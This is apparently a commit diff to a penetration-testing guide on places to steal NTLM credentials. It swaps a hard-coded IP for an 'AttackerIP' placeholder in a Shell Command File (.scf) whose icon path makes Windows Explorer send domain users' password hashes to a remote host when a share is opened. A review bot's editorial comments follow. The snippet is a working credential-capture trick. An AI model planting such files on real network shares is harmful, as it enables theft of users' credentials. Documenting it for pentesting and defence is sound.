Merge pull request #252 from A1vinSmith/master

Update places-to-steal-ntlm-creds.md
Carlos Polop 2021-10-07 13:28:51 +01:00 committed by GitHub
commit 79f06012ed
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23


@ -188,12 +188,12 @@ action=open Setup.exe
## Shell Command Files
You can save this as `something.scf` and once you open the folder explorer will try to resolve the network path for the icon.
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
```text
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
IconFile=\\AttackerIP\ordinary.ico
[Taskbar]
Command=ToggleDesktop
```
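Review bot: The description line beginning "It is possible to obtain passwords hashes" loses the trigger that the other description line states, namely that Explorer tries to resolve the network path in `IconFile` as soon as the folder is opened. Without it the reader is not told why dropping the file on a share is enough. I would keep that sentence and append the new explanation to it. Wording in the same line: "passwords hashes" should be "password hashes", and "when writing permissions given to unauthenticated users" should read "when write permissions are given to unauthenticated users". The "or shells" claim is not backed by anything in the snippet, which only sets an icon path and a `ToggleDesktop` command, so either explain it or drop it. The `\\AttackerIP\ordinary.ico` placeholder is the right choice over the literal address `\\35.164.153.224\test.ico`, so make sure only the placeholder line remains. Since the text names both `something.scf` and `ordinary.scf`, settle on one file name.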